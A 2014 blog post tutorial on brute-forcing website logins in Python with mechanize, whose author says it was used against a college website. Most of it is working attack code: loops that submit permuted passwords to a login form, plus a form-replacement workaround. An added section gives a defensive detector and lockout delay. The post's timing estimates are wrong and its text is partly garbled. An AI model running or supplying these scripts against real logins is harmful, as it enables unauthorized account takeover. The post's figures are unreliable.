Coder In Aero
POSTED BY
TEJA R D
POSTED ON
DECEMBER 8, 2014
POSTED UNDER
HACKING, PYTHON
(https://coderinaero.files.wordpress.com/2014/12/main.jpg)
Screenshot of a Python script running a brute-force attack on my college’s website.
This post gives a brief introduction to brute-force attacks and to Mechanize, a Python
library for web browsing, and explains a sample Python script that brute forces a website login.
https://coderinaero.wordpress.com/2014/12/08/brute-force-a-website-login-in-python/#more-3 1/10
28/02/2020 Brute Force A Website Login In Python | Coder In Aero
Brute force is the easiest method to implement for recovering lost passwords (yet it can take
literally ages to crack one). Basically, it involves checking all possible combinations of
passwords until the right one is found. This can be really helpful when the characters in the
password are known but not their correct order, since the number of possible combinations
then decreases drastically. The following paragraph gives a rough idea of how much time it
can take to find the right combination in the worst-case scenario.
Suppose the length of the password is N and we know nothing about the characters present in
the string. The possible characters are all letters (upper and lowercase), digits (0-9) and
special characters (~, @, #, $, ^), so each character of the password string can be any of
these 67 characters, which leads to a total of 67^N combinations (as you can clearly see,
this increases exponentially with the length). If we are brute forcing a website login, the
time taken depends significantly on the internet speed. For instance, if it can do four login
checks per second, it takes nearly 58 hours to crack a password of four characters. If we
know the characters, we can find the correct combination in 64 seconds, far less than in the
previous case.
Mechanize
Easy Install:
easy_install mechanize
Pip:
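import mechanize
br = mechanize.Browser()
url = "http://www.example.com/login/"  # login page (the example URL used later in this post)
response = br.open(url)
br.select_form(nr=0)  # select the first form on the page before submitting
br.method = "POST"
response = br.submit()
print(response.geturl())  # url to which the page has redirected after login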
We will use Python’s core module ‘itertools’ for generating possible password
combinations.
#!/usr/bin/python
import mechanize
import itertools
br = mechanize.Browser()
br.set_handle_equiv(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False) #no robots
3. Generating combinations
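If you know the characters in the password (see the itertools docs for more info):
combinations = itertools.permutations("i34^UhP#", 8)
# takes the characters and the length of the string to generate as arguments (no repetition)
# permutations() uses each character literally and does not expand ranges such as "a-z",
# so the character set is spelled out with the string module
import string
n = 4  # length of the password to generate (example value)
combinations = itertools.permutations(string.ascii_letters + string.digits + "!@#$%^", n)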
#!/usr/bin/python
import mechanize
import itertools

br = mechanize.Browser()
br.set_handle_equiv(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)

combos = itertools.permutations("i3^4hUP-", 8)
br.open("http://www.example.com/login/")
for x in combos:
    br.select_form(nr=0)
    br.form['userName'] = "user name"
    br.form['password'] = ''.join(x)
    print("Checking " + br.form['password'])
    response = br.submit()
    if response.geturl() == "http://www.example.com/redirected_to_url":
        # url to which the page is redirected after login
        print("Correct password is " + ''.join(x))
        break
Troubleshooting errors
Most of the time I ended up getting this error even though there is a form element in the
page. I thought this might be due to bad HTML in the page. Anyway, you can solve this
error by changing the form element in the browser object (copy the form element from the
page’s HTML). Here is the new code snippet:
#!/usr/bin/python
import mechanize
import itertools

br = mechanize.Browser()
br.set_handle_equiv(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)

combos = itertools.permutations("i34U^hP-", 8)
r = br.open("https://www.example.com/login/")
for x in combos:
    new_form = '''
<form method="post" action="index.php">
<b>Enter the username :</b><input type="text" name="rollno" size="16" maxleng
<b>Enter the password:</b><input type="password" name="pwd" size="16">
<input type="submit" name="submit" value="Submit">
</form>
'''
    # make sure the input fields and the submit button have the same names as in the page's form
    r.set_data(new_form)
    br.set_response(r)
    br.select_form(nr=0)
    # field names must match the replacement form above
    br.form['rollno'] = "user name"
    br.form['pwd'] = ''.join(x)
    print("Checking " + br.form['pwd'])
    response = br.submit()
    if response.geturl() == "http://www.example.com/redirected_to_url":
        # url to which the page is redirected after login
        print("Correct password is " + ''.join(x))
        break
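What the loops above look like from the server side, as an added example that is not part of the original post: a sliding-window detector that flags a source making many failed logins against one account, plus the capped exponential delay a login handler can apply after each failure. The event format, thresholds, function names and sample events are constructed for illustration.

```python
from collections import defaultdict, deque

# Constructed sample events: (unix_time, source_ip, username, success).
# 203.0.113.7 submits one guess every 0.25 s, the rate used in the post's estimate.
SAMPLE_EVENTS = (
    [(1000.0 + i * 0.25, "203.0.113.7", "user name", False) for i in range(40)]
    + [(1002.0, "198.51.100.9", "alice", False),   # one mistyped password
       (1030.0, "198.51.100.9", "alice", True)]    # followed by a normal login
)


def detect_bruteforce(events, max_failures=10, window=60.0):
    """Return {(ip, username): time_of_first_alert} for every pair that makes
    more than max_failures failed logins within `window` seconds."""
    recent = defaultdict(deque)  # (ip, user) -> timestamps of recent failures
    alerts = {}
    for ts, ip, user, ok in sorted(events):
        key = (ip, user)
        if ok:
            recent.pop(key, None)  # a successful login resets the counter
            continue
        q = recent[key]
        q.append(ts)
        while q and ts - q[0] > window:  # drop failures older than the window
            q.popleft()
        if len(q) > max_failures and key not in alerts:
            alerts[key] = ts
    return alerts


def lockout_delay(failures, base=1.0, cap=900.0):
    """Seconds the login handler should wait before accepting another attempt
    after `failures` consecutive failed logins (exponential backoff, capped)."""
    if failures <= 0:
        return 0.0
    return min(cap, base * 2 ** (failures - 1))


if __name__ == "__main__":
    for (ip, user), ts in detect_bruteforce(SAMPLE_EVENTS).items():
        print("ALERT %s -> %r at t=%.2f" % (ip, user, ts))
    print("delay after 5 failures: %.0f s" % lockout_delay(5))
```

Keying a second counter on the username alone catches the same loop when it is spread across several source addresses.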